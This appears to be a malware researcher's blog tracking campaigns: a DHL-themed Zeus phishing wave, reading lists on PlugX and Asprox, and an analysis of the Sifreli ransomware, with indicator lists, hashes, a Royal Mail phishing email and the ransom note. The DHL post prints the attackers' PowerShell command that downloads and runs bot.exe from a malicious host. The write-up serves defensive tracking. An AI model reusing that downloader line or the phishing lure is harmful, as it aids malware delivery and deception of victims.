rebus snippets

2015-11-19

DHL themed Zeus campaign is using Powershell as malware downloader

Hello,
I have spotted DHL themed phishing campaign using Powershell as malware downloader. Here are some samples of the malicious downloader attachment from the phishing email:

https://malwr.com/analysis/YTlhOGRmNTNlYzQzNGIzNTg0ZTZiOTFkNDg1OGI1Nzc/
https://malwr.com/analysis/ZmU0MjliNzNhYmRlNDE1YmE4ZGQ3NWIyNzAxMzQzNzE/

Attachment has extension *.doc.zip file (to pretend to look like zippeddocument) and inside there is *.doc.lnk.
Instead of the MS office document there is windows shortcut (.lnk), but normal users will most probably see only ".doc", because the common setting on windows is to hide extension of known file types. Link file points to powershell binary and has download script as commandline parameter.

Powershell donwloader example:
(New-Object System.Net.WebClient).DownloadFile('hxxp://nov01mail.pw/bot.exe','%temp%\l.exe');(New-Object -com Shell.Application).ShellExecute('%temp%\l.exe');!%SystemRoot%\system32\SHELL32.dll

The phishing email targets on german speaking victims. Sample email here:
http://www.trojaner-board.de/172090-gefaelschte-dhl-email-schaedliche-infektion.html
http://www.netzwelt.de/news/155327-vorsicht-dhl-virus-neue-spam-welle-trojaner-anhang.html
http://phishing-mails.blogspot.co.uk/2015/10/dhl-paket-angekommen.html
http://blog.botfrei.de/2015/10/erneute-dhl-spamwelle-erreicht-unsere-rechner/
Source http://blog.botfrei.de

These IPs seems to be serving as the download sites for the malware(or were at some point in time):
5.1.75.148
64.110.131.48
107.161.27.133
162.221.176.38
172.98.211.5
172.245.59.194
192.95.11.146
192.227.244.6
198.98.101.159
198.175.126.100
216.45.55.231

Download sites:
hxxp://2610goodvin.pw/bot.exe
hxxp://2710goodvin.pw/bot.exe
hxxp://cash777.pw/bot.exe
hxxp://casher777soft.pw/bot.exe
hxxp://cyberdrive77787.pw/bot.exe
hxxp://goodprice27.pw/bot.exe
hxxp://goodprice28.pw/bot.exe
hxxp://goodvin77787.in/bot.exe
hxxp://jinsuperstarberlin.pw/bot.exe
hxxp://mamba7777.pw/bot.exe
hxxp://masterb.in/bot.exe
hxxp://masterdj.pw/bot.exe
hxxp://masterhost2777.pw/bot.exe
hxxp://masterjin777.pw/bot.exe
hxxp://masterl188.pw/bot.exe
hxxp://masterlin188.pw/bot.exe
hxxp://masterlin288.pw/bot.exe
hxxp://masterlin788.pw/bot.exe
hxxp://megamail777.pw/bot.exe
hxxp://mis2018.pw/bot.exe
hxxp://mrsoft777.pw/bot.exe
hxxp://nov01mail.pw/bot.exe
hxxp://nov15mailmarketing.in/bot.exe
hxxp://nov19mailmarketing.pw/bot.exe
hxxp://supermoney.pw/bot.exe
hxxp://supersoftware777.pw/bot.exe
hxxp://superstar7747.pw/bot.exe
hxxp://superstar7747.pw/cc.exe
hxxp://supportsoft777.pw/bot.exe
hxxp://verygoodwin7.pw/bot.exe

Some Samples - unfortunately the malware detection from AV vendors is quite unconclusive on the malware family, but according to abuse.ch it is some moddified version of Zeus so hopefully these will get tracked by ZeusTracker.abuse.ch at some point:
62c02f0bb1145d3928b1df7493476f88
9abcd77b3d4c487c59c88511dcf8a719
8375e892e2c447ffe3e55cb818f68de0
d62a8b934836b58f25f047620f269bc7
62c02f0bb1145d3928b1df7493476f88
09b9b83f37998713ae972a2fc6e45e2f
7dd81b268585c596ed83a38f696a7d4f
4f9e35c56b87b516b587c64da33f2012
581eb87538fd2b65f2ba19f30e2f64ba
363ff98bc76668092eb5b00e55e1a9d3

I was able to obtain these 3 samples and run it through malwr.com
ccb86eccbde7683410910adf09bc0a62
        from hxxp://masterlin788[.]pw/bot.exe
        https://malwr.com/analysis/ZjhiMmVkZjI3NGU3NGM1MGFlNzVjZDY0M2Y0NzcxMjI/
        https://www.hybrid-analysis.com/sample/f8ab572c3a395812147faed7fef2c688c0c2b3d06c0074ade741ad4d51fd870c/?environmentId=1

d0c2e2a48459ea52cc0e42e15c995ee2
        from hxxp://nov19mailmarketing[.]pw/bot.exe
        https://malwr.com/analysis/YWNjYWY1NDk5MjAxNGNjYWFiMDEwNTRhNzNmODY0NTk/
        https://www.hybrid-analysis.com/sample/6bbb45a9784a0b83f077d6a9d4a7e89d07ddd79a9f8b5d605aad3ab0855d9655?environmentId=1

1a482869a04f9bfe1a557ec391f5df57
        from hxxp://supportsoft777[.]pw/bot.exe
        https://malwr.com/analysis/YWY3NTZlYjg1NzJjNGFmYjliNDU2NmFhNDBmNjFhYjc/

2015-08-24

PlugX Chronicles

This blog-post is to compile list of articles and information bits about the PlugX - malware used as a RAT by several APT groups.

PlugX Tracker - http://ptrack.h3x.eu
PlugX Unsorted Corpus (not categorized samples) http://ptrack.h3x.eu/corpus/297
PlugX Corpus of Setup files (usually RAR SFX) http://ptrack.h3x.eu/corpus/290
PlugX Corpus of EXE (usually signed goodware) http://ptrack.h3x.eu/corpus/291
PlugX Corpus of DLL (malicious stub to load the encrypted payload) http://ptrack.h3x.eu/corpus/292
PlugX Corpus of ENC (encrypted payload) http://ptrack.h3x.eu/corpus/293
PlugX Corpus of DOC (phish documents with embedded PlugX) http://ptrack.h3x.eu/corpus/295

Materials on the topic:

2015-11-24 - PaloAltoNetworks - Attack Campaign on the Government of Thailand Delivers Bookworm Trojan
2015-11-06 - Volatility Labs - PlugX: Memory Forensics Lifecycle with Volatility - announcement
2015-10-29 - Michael Ligh / Volatility Labs - PlugX: The Memory Forensics Lifecycle - presentation
2015-10-16 - Citizenlab - Targeted Malware Attacks against NGO Linked to Attacks on Burmese Government Websites
2015-10-15 - Charles Rami / Proofpoint - Le cheval de Troie PlugX à l’assaut de l’armée et des télécommunications en Russie
2015-10-08 - Sarah Silvestriadis / Wapack Labs - PlugX malware is highly customizable for hackers to pick up – bad news for confidential data
2015-09-15 - In Pursuit of Optical Fibers and Troop Intel: Targeted Attack Distributes PlugX in Russia
2015-09-13 - Christian - Using threat_note To Track Campaigns: Returning to PIVY and PlugX Infrastructure
2015-09-08 - Fabien Perigaud - Volatility plugin for PlugX updated
2015-09-04 - Threat Research Team Goes “Beyond the Exploit” in Search of Payloads from MS15-093
2015-08-20 - ASERT Threat Intelligence Report 2015-05 PlugX Threat Activity in Myanmar
2015-08-19 - Symantec - New Internet Explorer zero-day exploited in Hong Kong attack
2015-08-19 - Sara Peters - IE Bug Exploited In Wild After Microsoft Releases Out-Of-Band Patch
2015-08-19 - Andra Zaharia - Security Alert: Millions Exposed to Cyber Attacks Because of Internet Explorer Vulnerability
2015-08-08 - Christian: Poison Ivy and Links to an Extended PlugX Campaign
2015-08-06 - Fabien Perigaud/Airbus - Latest changes in PlugX
2015-08-05 - Dell - Threat Group-3390 Targets Organizations for Cyberespionage
2015-08-03 - Jason Jones / Arbor - Automating Intelligence: Discovering Recent PlugX Campaigns Programmatically
2015-07-30 - Sudeep Singh, Kenneth Hsu / FireEye - CVE-2015-0097 Exploited in the Wild
2015-07-28 - FBI Flash - Alert Number A-000063-MW - Plugx
2015-06-?? - Paul Shomo - The OPM Hack: I Smell a RAT
2015-06-18 - Ellen Nakashima / The Washington Post - Chinese had access to U.S. security clearance data (OPM) for one year
2015-04-24 - Roddell Santos / TrendMicro - New Wave of PlugX Targets Legitimate Apps
2015-02-15 - Gabor Szappanos / Sophos - plugx-goes-to-the-registry-and-india.pdf
2015-02-15 - John Zorabedian / Sophos - research uncovers new developments in PlugX APT malware
2015-01-29 - Shusei Tomonaga / JPCERT - Analysis of a Recent PlugX Variant - “P2P PlugX”
2014-11-12 - Robert Lipovsky / Korplug military targeted attacks: Afghanistan & Tajikistan
2014-10-30 - Gabor Szappanos / Sophos - sophos-rotten-tomato-campaign.pdf
2014-10-30 - John Zorabedian / Sophos - The Rotten Tomato Campaign: New SophosLabs research on APTs
2014-09-01 - Brandon Dixon - Plugx Development Testing
2014-09-01 - @9bplus - Watching Attackers Through Virustotal
2014-08-14 - Ned Moran, Joshua Homan, Mike Scott / FireEye - Operation Poisoned Hurricane
2014-07-24 - Geok Meng Ong, Chong Rong Hwa / FireEye - Pacific Ring of Fire: PlugX / Kaba
2014-07-02 - John Zorabedian / Sophos - The next generation of the PlugX APT – new SophosLabs research
2014-06-30 - Gabor Szappanos / Sophos - plugx-thenextgeneration.pdf
2014-06-30 - Gabor Szappanos / Sophos - PlugX - the next generation
2014-03-31 - Takahiro Haruyama - I Know You Want Me - Unplugging PlugX
2014-03-27 - Takahiro Haruyama/CCI - ID/IDAPython scripts extracting PlugX configs
2014-03-12 - Takahiro Haruyama - PlugX Builder/Controller (Type III, 0x840)
2014-01-29 - Fabien Perigaud / Airbus - PlugX "v2": meet "SController"
2014-01-06 - Fabien Perigaud / Airbus - PlugX: some uncovered points
2013-12-17 - Roman Vasilenko, Kyle Creyts / Lastline - An Analysis of PlugX Malware
2013-12-05 - John Zorabedian / Sophos - SophosLabs researchers dissect PlugX Trojan targeting users in Japan
2013-11-12 - Nart Villeneuve, Mike Scott / FireEye - Exploit Proliferation: Additional Threat Groups Acquire CVE-2013-3906
2013-05-14 - FireEye - Targeted Attack Trend Alert: PlugX the Old Dog With a New Trick
2013-03-26 - Kevin O’Reilly /Contextis - PlugX_-_Payload_Extraction_March_2013_1.pdf
2012-11-27 - Dmitry Tarakanov / Kaspersky Securelist - PlugX is Becoming Mature
2012-09-17 - Abraham Camba / TrendMicro - Unplugging PlugX Capabilities
2012-09-13 - AlienVault - Tracking Down the Author of the PlugX RAT
2012-09-10 - Roland Dela Paz / TrendMicro - PlugX: New Tool For a Not So New Campaign

2015-04-08

Asprox botnet chronicles

This blog-post is to compile list of articles and information bits about the Asprox botnet.
Asprox malware is being spread around with phishing emails claiming to be from DHL/Fedex/USPS/American Airlines/Costco/Walmart/Pizza Hut/Home Depot/Target and many others as well. It also likes to claim it is court order, funeral/wedding announcement or missed voicemail from WhatsApp.

Asprox C2 Tracker - http://atrack.h3x.eu
Asprox Corpus of EXE (downloader) http://atrack.h3x.eu/corpus/2
Asprox Corpus of ZIP (downloader) http://atrack.h3x.eu/corpus/6
Asprox Corpus of EXE (2nd stage/update) http://atrack.h3x.eu/corpus/5
Asprox Corpus of TXT (displayed message) http://atrack.h3x.eu/corpus/7
Asprox Corpus of DLL modules http://atrack.h3x.eu/corpus/8

Materials on the topic:

2015-03-09 - Brad Duncan - What Happened to You, Asprox Botnet?
2015-02-25 - TechHelpList - former Asprox intfrastructure used for drug advertising
2015-02-04 - TechHelpList - former Asprox intfrastructure used for porn advertising
2015-01-02 - Malware-Traffic-Analysis - Fake Target phishing emails from the Asprox botnet
2014-12-29 - TechHelpList - Parking Violation Notice - Asprox Malware
2014-12-17 - TechHelpList - Details of your order from Best Buy - Asprox Malware
2014-12-16 - TechHelpList - Order Confirmation - Walgreens - Asprox Malware
2014-12-15 - PaloAlto - Kulouz, Asprox malware family accounts for 80% of attacks
2014-12-13 - Softpedia - Facebook Password Change Email Leads to Asprox Malware
2014-12-11 - TechHelpList - Facebook password change - Asprox Malware
2014-12-11 - The Register - Elderly zombie Asprox botnet STILL mauling biz bods, says survey
2014-12-11 - Malware-Traffic-Analysis - Asprox botnet phishing campaign - Subject: Facebook password change
2014-12-03 - Gary Warner - ASProx malware threat targets holiday shoppers
2014-12-03 - Brian Krebs - Be Wary of ‘Order Confirmation’ Emails
2014-11-27 - TechHelpList - Thank you for buying / Order Confirmation / Multiple - Asprox Malware
2014-11-20 - Damballa - Partners in Cyber Crime: Following an Advanced Malware Infection Chain
2014-11-20 - Damballa - Behind_Malware_Infection_Chain_Rerdom research paper
2014-11-12 - Malware-Traffic-Analysis.net - Asprox botnet fake Starbucks phishing emails - delivered Sirius Win 7 Antivirus 2014
2014-11-07 - PaloAlto - Kuluoz Trends – October 2014
2014-10-29 - Malware-Traffic-Analysis.net - Asprox botnet serving Starbucks coffee
2014-10-28 - Malware-Traffic-Analysis.net - Asprox botnet serving free pizza
2014-10-08 - TechHelpList - Enjoy your Starbucks Card eGift - Asprox Malware
2014-10-02 - TechHelpList - LINE - You have a voice message - Asprox Malware
2014-09-11 - Malware-Traffic-Analysis.net - Asprox botnet phishing campaign - DPD - Subject: Home Delivery Notification
2014-09-09 - Malware-Traffic-Analysis.net - Apsrox botnet phishing emails - Delta Airlines
2014-09-05 - Malware-Traffic-Analysis.net - Asprox botnet phishing email - FedEx - Subject: Postal Notification
2014-08-29 - Malware-Traffic-Analysis.net - Asprox botnet phishing email - Subject: Notice of court attendance
2014-08-28 - Nick - How Asprox Malware Became an APT in 4 Phases
2014-08-18 - Malware-Traffic-Analysis.net - Asprox botnet phishing email - Subject: Payment for driving on a toll road
2014-08-06 - Symantec - Asprox URLViewer delivers porn adverts
2014-08-04 - Kimberly - Asprox Update - Version 2050
2014-07-28 - Long Tran (Fortinet) - Changes in the Asprox Botnet
2014-07-22 - Malware-Traffic-Analysis.net - Asprox botnet fake E-ZPass phishing emails
2014-07-10 - Malware-Traffic-Analysis.net - Asprox botnet fake court case phishing emails
2014-07-09 - Malware-Traffic-Analysis.net - Asprox botnet fake funeral announcement phishing emails
2014-07-08 - Malware-Traffic-Analysis.net - Asprox botnet fake E-ZPASS phishing emails
2014-06-17 - Kevin Ross - Suricate IDS signature for Asprox traffic
2014-06-16 - FireEye - A Not-So Civic Duty: Asprox Botnet Campaign Spreads Court Dates and Malware
2014-05-15 - Kimberly - A Journey Inside the Asprox Modules
2014-03-17 - Frank Jas - New variant of Kuluoz discovered
2014-02-28 - Kimberly - Urgent eviction notification - A deeper dive into the Asprox Ecosystem
2014-02-12 - TechHelpList - Your application received - Asprox Malware
2014-02-06 - TechHelpList - Asprox botnet advertising fraud - general overview 1
2014-01-30 - Kimberly - Eubank Funeral Home themed emails lead to Asprox
2014-01-30 - Brad - Asprox Emails and Malware
2014-01-11 - Kimberly - PG&E Energy Statement themed emails lead to Asprox
2014-01-15 - TechHelpList - Death Notification - Asprox Malware
2014-01-07 - TechHelpList - Delivery Canceling - Energy Statement - Malware
2014-01-07 - Kimberly - Best Buy themed emails lead to Asprox
2014-01-06 - TechHelpList - Asprox botnet trojan run - advertising fraud 1
2014-01-04 - Herrcore - Inside The New Asprox/Kuluoz
2014-01-05 - Kimberly - Atmos Energy Bill themed emails lead to Asprox
2013-12-30 - Kimberly - The Asprox botnet wants you to appear in Court
2014-12-26 - Kimberly - Costco themed emails lead to Asprox
2013-12-26 - Peter Kruse - Asprox er tilbage (Adobe License)
2013-12-26 - Gary Warner - Holiday Delivery Failures lead to Kuluoz malware
2013-12-26 - TechHelpList - Scheduled Home Delivery Problem - Asprox Malware
2013-12-23 - TechHelpList - Hearing of your case in Court NR#... - Virus
2013-12-23 - Conrad Longmore - "Hearing of your case in Court NR#6976" spam
2013-12-23 - Daniel Wesemann - Costco, BestBuy, Walmart really want to send you a package!
2013-12-23 - TechHelpList - Hearing of your case in Court NR#... - Virus
2013-12-22 - TechHelpList - Asprox botnet trojan run - malware spamming 1
2013-12-20 - TechHelpList - Please look my CV - Virus
2013-12-14 - Johannes B. Ullrich - WhatsApp Malware Spam uses Geolocation to Mass Customize Filename
2013-12-06 - TechHelpList - You can download your ticket #... - Virus
2013-11-28 - Kimberly - Fake WhatsApp Voice Mail Notification invites Asprox and friends - Kimberly spotted that downloads are using geoip location to custmize filename
2013-11-13 - Kimberly - Analysis of Asprox and its New Encryption Scheme
2013-11-12 - TechHelpList - New Voicemail Notification - WhatsApp - Malware
2013-10-18 - TechHelpList - Wedding Invitation - Malware
2013-09-20 - Gary Warner - Fake AV Malware Hits the Android
2013-08-15 - Shaked Bar - Kuluoz: Malware and botnet analysis
2013-07-07 - #MalwareMustDie! In war with Kuluoz network../2/3
2013-06-05 - TechHelpList - Fake Fedex Item Forbidden - Virus
2013-06-04 - TechHelpList - Your Parcel Has Been Send - Virus
2013-05-01 - RebSnippets - Asprox Botnet 2013 - Phishing Malware As a Service
2013-04-22 TechHelpList - Your Order - Fake DHL Malware
2013-03-04 - Trendmicro - Asprox Reborn blog
2013-02-28 - Trendmicro - Asprox Reborn research paper
2013-02-01 - Trendmicro - Asprox Botnet Reemerges in the Form of KULUOZ
2013-02-01 - Trendmicro - BKDR_KULUOZ – At a Spam Near You
2012-10-09 - HertSec - Investigating UPS Phishing Emails
2012-12-12 - Kent Backman - Another familiar phish, yet more ransomware controller proxies
2012-09-25 - Kent Backman - New Asprox phish, a few old and many more controller proxies
2012-09-21 - Miroslav Stampar - Analysis of mass SQL injection attacks(old scheme)
2012-09-15 - Kent Backman - Click here for your Asprox package
2012-08-30 - Christopher J. Marcinko - No, USPS Did Not Fail to Deliver a Package This Week
2012-01-14 - Ken Johnson - FakeAVLock - FedEx Shipping Issues - Revisited
2010-06-25 - ITNews - Asprox botnet causing serious concern
2009-10-05 - Gunter Ollmann - Asprox Rearing its SQL Injection Head Again
2009-02-10 - Greg Martin - ASPROX Back with a vengance
2008-09-29 - SANS - ASPROX mutant
2008-08-04 - Greg Martin - ASPROX Latest Attack Vector: JS.JS
2008-07-?? - SANS - Cleanup in isle 3 please. Asprox lying around
2008-07-23 - Greg Martin - ASPROX SQL Injection Botnet and iFrame/Malware
2008-07-07 - Greg Martin - ASPROX Payload Morphed NGG.JS
2008-06-30 - SANS Robert Danford - More SQL Injection with Fast Flux hosting
2008-06-26 - Gerg Martin - ASPROX SQL Injection Attacks cont.
2008-06-23 - Greg Martin - ASPROX SQL Injection Botnet and iFrame/Malware
2008-06-13 - SANS Johannes Ulrich - SQL Injection: More of the same
2008-01-09 - SANS Bojan Zdrnja - Mass exploits with SQL Injection

2014-02-27

Sifreli Ransomware

This blogpost io to publish and trace the information about the Sifreli ransomware. The word "sifreli" means encrypted in Turkish and that is also the extension malware was using for the encryted files. This ransomware, when executed, encrypts all data files with AES encryption. Password used for ecryption is random and user is presented only with the version encrypted with RSA public key. Attackers claim that if ransom is paid within 3 days, they will decrypt the unique session key and grant it back to victim in order for him to be able to decrypt back his precious data (text, photos, zip, word ...). Whether this can be trusted I do not know. Yes technically it is possible, but in reality I would not recommend to pay any ransom as you have got no guarantee that you wont get reinfected just the other day.

Materials on the topic:

2014-02-20 - Crypto key methods malware uses to blackmail
2014-02-19 - Turkish forum discussing the same ransomware spreading pretending to be a bill from TurkCell
2014-02-18 - Trend Micro analysis of the Turkish mutation
2012-12-27 - Same ransomware spreading in Turkey in 2012

Phishing email

On the begining of the chain there is a phishing email with link to download site. The phishing email for the Royal-Mail campaign looked like this:

From: customercare@parcel-tracking.net [mailto:customercare@parcel-tracking.net]
Sent: 24 February 2014 12:12
To: John Doe
Subject: Parcel to John Doe

John Doe

A courier did not deliver the parcel to your address 21 February 2014, because nobody was at home.

Please download information about parcel, print it and go to post office to receive a package.

Attention

If the parcel isn't received within 30 working days Royal Mail will have the right to claim compensation from you for it's keeping in the amount of 5.70 £ for each day of keeping. You can find the information about the procedure and conditions of parcel keeping in the nearest office.

This is automatically generated email, please click here to unsubscribe.

Royal Mail Group Ltd 2013. All rights reserved

Malware Download

Download site mimics the site of the attacked well known brand name. For Turkey it was Turkcell - local mobile telephone operator. For the campaign targeting the UK the download site was attacking brand name of Roayl Mail. Attacker gains the trust of the victims by :

site looks quite genuine, cloning the look and feel from the site being phished
it is including the fake captcha for download of the malware file, to download you need to enter the right code from sceen
it claims it will download pdf, gaining the trust by fact that downloaded zip contains a file with PDF icon - pity that it is malicious EXE indeed
download site looks quite clean on the first look, but after entering the "captcha" the reloaded page contains 2 iframes. One is the zipfile with the malware, the second is probably redirect to some drive-by download.
Part of the file name of the zip file is changing with string of random generated numbers t look real

List of known download sites:

http://www.parcel-tracking.net/track-trace/track.php?id=9780165 (IP 194.58.38.112)
http://csi.efatura-turkcell.net/amserver/UI/Login.php (IP 194.58.43.23)
http://csi.efatura-turkcell.org/amserver/UI/Login.php (IP 194.58.43.23)
Probably next in row csi.efatura-turkcell.com (IP 194.58.43.23)

Download link with the zip file looks like this (numbers are random):

http://www.parcel-tracking.net/track-trace/track_97d899969188667e28e4b4578bdbfe3a.zip
http://csi.efatura-turkcell.org/amserver/UI/fatura_938e5e06af8a595faf700a0f1e1e5765.zip
http://csi.efatura-turkcell.net/amserver/UI/fatura_6a28ff001a41304c559956f39f53a3ec.zip

Iframe redirecting to affiliate sites looks like this:

http://www.parcel-tracking.net/track-trace/div.php
=> http://eebeixee.aerameis.com:8000/rkfnpmymyqfet?tqrppmv=6614810 (IP 212.83.170.14)
http://csi.efatura-turkcell.net/amserver/UI/6r3k412v585b.php
=> http://jaivohpo.aerameis.com:8000/stppe?tcpbm=4984420 (IP 212.83.170.14)
http://csi.efatura-turkcell.org/amserver/UI/rxgfna7qfunxeo.php
=> http://eichohng.aerameis.com:8000/rvegnykbh?tkdfntudnsub=4984420 (IP 212.83.170.14)
It is probably recommended to disable all *.aerameis.com

Execution of the ransomware

When the ransomware is executed, it immediately starts encrypting all files it finds on local hard-drive and-or on available network shares. Encryption is performed with a random generated key. Same key is used for all the files. For each encrypted file there is created file with the original file name and the extension of ".encrypted" ( or it was ".sifreli" in the Turkish language mutation).

When encryption does enough damage and/or after reboot of machine the ransom message is being displayed as a annoying pop-up window, which is not possible to kill. Sample of the message displayed also as a Walpaper image on the desktop.

The same message is also written to any folder with encrypted files as a new file PLEASE_READ.inf (in Turkish version it is LUTFEN_OKUYUN.inf). Hello, I am an IT specialist, I research system vulnerabilities and make profit by selling them. I have found one vulnerability in your system and hacked it. I have copied all valuable data from this PC and from your computer network. Then I have encrypted the files and if you are willing to decrypt them you need to buy a decryption key from me. Here is my contact: e-mail: it-specialist@mail.ua You have 3 days to purchase the decryption key, otherwise some of your sensitive data may be published on the internet and your system will not get decrypted. Information for IT specialists: 1. Anti-virus will delete encryption program but will not decrypt the data. Using system restore point will not help you to recover the data. 2. Data was encrypted with AES (Rijndael) algorithm (256 bit). Encryption key was encrypted with RSA (2048 bit) algorithm. This is extremely secure cryptography technique, around 1000 year time period will be required to break it, so do not try to do it. ---- Encrypted Session Key Begin ---- 3407AF961E9B807B9C998CB610167677842CAF9E9FDACF3BED3B3EAC2044B80E8171D35F78072E525BD049E5BC717C1ABA7C00B5E0A087436AA68C159AAEDD69067D841B66EB4F297CD06F74A884CDA7DE8B6768FF3C8AAABAE42FF78690596D487C1B8FBBFB865999C8CEE81736D28C60E8782DBA94F4CDC95D3FDD6FC7F9F93E3AB5FC431F72104B64EB059BCAD77357D80462AB5C73C300529C0DCCCD3163FD2F0B7B4575BA9FEAC600952BECDCE2D87FC76A676F1FF6824D17C2B6B797D8360E8FF00604B4A85C6CD785AD409B13EDDC899DF0B8F3B64F59080DFA623CF3DB598CCF50FE64D4D87B91708CA1F9E627EA03426AE13173EE8372EA7F8F21C3 ---- Encrypted Session Key End ----

Crypto

Files seems to be encrypted with a algorithm with 128-bit block size. This can be judged based on the padding (not-)used. Entropy of the encrypted files is very high - very close to 8 bits per byte. This could very well be AES (128 bit block size) with 256 bit key as claimed by the attackers. Unique key seems to be generated for each run of the malware, until files are encrypted.

	VT	MW	TH	TE	Joe	Eu	First Seen	Sample MD5	File Name	Mutex	pehash	imphash
Y	Y	Y	N	N	Y	Y	2014-02-24 23:26	6323daca233ace221030d25ae937930e	information.exe	\\Global\\Bit\ Torrent\ Application\ Instance	fdd375a5293e58d9bd07527fe9bcd4b1db5e9819	38ae2453fdc4e1b45f524ad9bfed11ab
Y	Y	Y	N	N	Y	Y	2014-02-24 14:55	a307146f76d193565f8d710e5f16331e	Tracking_information.exe	\\Global\\Bit\ Torrent\ Application\ Instance	fdd375a5293e58d9bd07527fe9bcd4b1db5e9819	38ae2453fdc4e1b45f524ad9bfed11ab
Y	Y	Y	N	N	Y	N	2014-02-24 12:47	99aa69515cde6f6c39cc3ba8f952227c	tracking_information.exe	\\Global\\Bit\ Torrent\ Application\ Instance	fdd375a5293e58d9bd07527fe9bcd4b1db5e9819	38ae2453fdc4e1b45f524ad9bfed11ab
Y	Y	Y	Y	N	Y	Y	2014-02-20 06:36	724abecfbfda53d0023c0e285af03ae4	20140220_1032_DEWA_bill.exe	\\Global\\Bit\ Torrent\ Application\ Instance	d82f1f3820bf578e33b9d757d7aae1c62725d927	2e99da085bf3de75e71310329aef4bea
N	Y	Y	N	N	N	N	2014-02-17 22:38	25443de5463f526697b82ff7612d2a19	fatura_878f1e09a51d2906c8d53fb468937636.zip	\\Global\\Bit\ Torrent\ Application\ Instance
Y	Y	Y	N	N	Y	Y	2014-02-17 14:27	2b3c9700435cea2f2315255272e35abd	20140217_2338_fatura.exe	\\Global\\Bit\ Torrent\ Application\ Instance	5837628aced008ad4b90de61191754ef20553a9c	2e99da085bf3de75e71310329aef4bea
N	Y	Y	N	N	Y	N	2014-02-17 09:56	184a21461a5275c6938fc531711abc80	fatura.exe	\\Global\\Bit\ Torrent\ Application\ Instance
N	Y	Y	N	N	Y	N	2014-02-11 12:47	97fb2dfd447c5c6dbe0fc76ee0efeb67	fatura.exe	\\Global\\Bit\ Torrent\ Application\ Instance